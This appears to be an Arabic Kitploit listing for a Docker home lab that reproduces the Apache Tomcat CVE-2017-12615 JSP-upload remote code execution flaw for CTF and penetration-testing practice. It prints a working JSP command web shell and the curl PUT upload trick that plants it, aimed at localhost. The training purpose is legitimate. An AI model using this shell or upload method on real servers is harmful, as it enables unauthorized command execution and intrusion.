Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2017-12615-Home-Lab — CVE-2017-12615 Tomcat: تنفيذ التعليمات البرمجية عن بُعد عبر رفع JSP — مختبر منزلي للفريق الأحمر واختبار الاختراق | Kitploit
أدوات/GitHubGitHub/netw0rk7/cve-2017-12615-home-lab
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبCTFاختبار الاختراقالتعلم والتعليمالفريق الأحمرمختبرات وتدريب عملي
GitHubnetw0rk7/cve-2017-12615-home-lab

CVE-2017-12615-Home-Lab

CVE-2017-12615 Tomcat: تنفيذ التعليمات البرمجية عن بُعد عبر رفع JSP — مختبر منزلي للفريق الأحمر واختبار الاختراق

عرض المستودع
منذ 8 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2017-12615 Tomcat: تنفيذ الأكواد عن بُعد عبر رفع JSP

صورة

يحاكي هذا المختبر ثغرة CVE-2017-12615 Tomcat: تنفيذ الأكواد عن بُعد عبر رفع JSP
تنشأ الثغرة بسبب تعيين readonly=false، ما يسمح برفع الملفات عبر HTTP PUT، بما في ذلك ملفات .jsp التي يمكنها تنفيذ الأوامر (RCE).


صورة

الميزات

  • Apache Tomcat 7.0.79 (نسخة قابلة للاستغلال)
  • تجاوز إعداد DefaultServlet مع readonly=false
  • إمكانية استخدام PUT Upload لوضع ملفات .jsp في دليل الويب ROOT
  • دعم تنفيذ الأوامر عبر web shell
  • صفحة ويب بأسلوب Industrial مع ملاحظة داخلية نُسِي حذفها (تلميح)
  • إنشاء flag_RANDOM.txt تلقائيًا في كل مرة تبدأ فيها الحاوية
  • مصممة لـ CTF / Red Team / التدريب على اختبار الاختراق

بنية الدليل

root@kitploit:~
/opt/apache-tomcat-7.0.79/
/opt/apache-tomcat-7.0.79/webapps/ROOT/index.jsp
/opt/apache-tomcat-7.0.79/webapps/ROOT/WEB-INF/web.xml
/tmp/flag_RANDOM.txt
/docker-entrypoint.sh

طريقة الاستخدام (تشغيل الحاوية)

root@kitploit:~
docker compose build
docker compose up -d

افتح الموقع:

root@kitploit:~
http://localhost:8080/

طريقة اختبار الثغرة CVE-2017-12615

1) إنشاء ملف JSP payload

root@kitploit:~
cat > shell.jsp << 'EOF'
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
if (cmd != null) {
    String s;
    Process p = Runtime.getRuntime().exec(cmd);
    BufferedReader r = new BufferedReader(new InputStreamReader(p.getInputStream()));
    while ((s = r.readLine()) != null) out.println(s + "<br>");
}
%>
EOF

2) رفع الملف باستخدام PUT (يجب إضافة / في نهاية اسم الملف)

root@kitploit:~
curl -v -X PUT "http://localhost:8080/shell.jsp/"   -H "Content-Type: text/plain"   --data-binary @shell.jsp

3) استدعاء webshell

root@kitploit:~
http://localhost:8080/shell.jsp?cmd=id

العلم

يُخزَّن في:

root@kitploit:~
/tmp/flag_RANDOM.txt

النسخة الإنجليزية — CVE-2017-12615 Tomcat: تنفيذ الأكواد عن بُعد عبر رفع JSP

يحاكي هذا المختبر ثغرة CVE-2017-12615 Tomcat: تنفيذ الأكواد عن بُعد عبر رفع JSP، حيث يتم ضبط DefaultServlet في Apache Tomcat بشكل خاطئ على:

root@kitploit:~
readonly=false

يتيح هذا للمهاجمين رفع ملفات .jsp عبر HTTP PUT، ما يسمح بتنفيذ الأكواد عن بُعد.


صورة

الميزات

  • Apache Tomcat 7.0.79 نسخة قابلة للاستغلال
  • تجاوز إعداد DefaultServlet مع readonly=false
  • PUT Upload → كتابة ملفات .jsp عشوائية في دليل الويب ROOT
  • يدعم تنفيذ الأوامر عبر JSP shell
  • صفحة هبوط بأسلوب Industrial مع تلميح داخلي خفي
  • إنشاء تلقائي لـ flag_RANDOM.txt عند بدء تشغيل الحاوية
  • مناسبة لـ CTF والأبحاث وتطوير الاستغلالات

مثال على الاستغلال

رفع JSP shell

root@kitploit:~
curl -v -X PUT "http://localhost:8080/shell.jsp/"   -H "Content-Type: text/plain"   --data-binary @shell.jsp

تنفيذ الأوامر

root@kitploit:~
http://localhost:8080/shell.jsp?cmd=id

موقع العلم

root@kitploit:~
/tmp/flag_RANDOM.txt

إخلاء مسؤولية

للاستخدام التعليمي والبحثي واختبار الاختراق المصرح به فقط.

تنزيل الأداة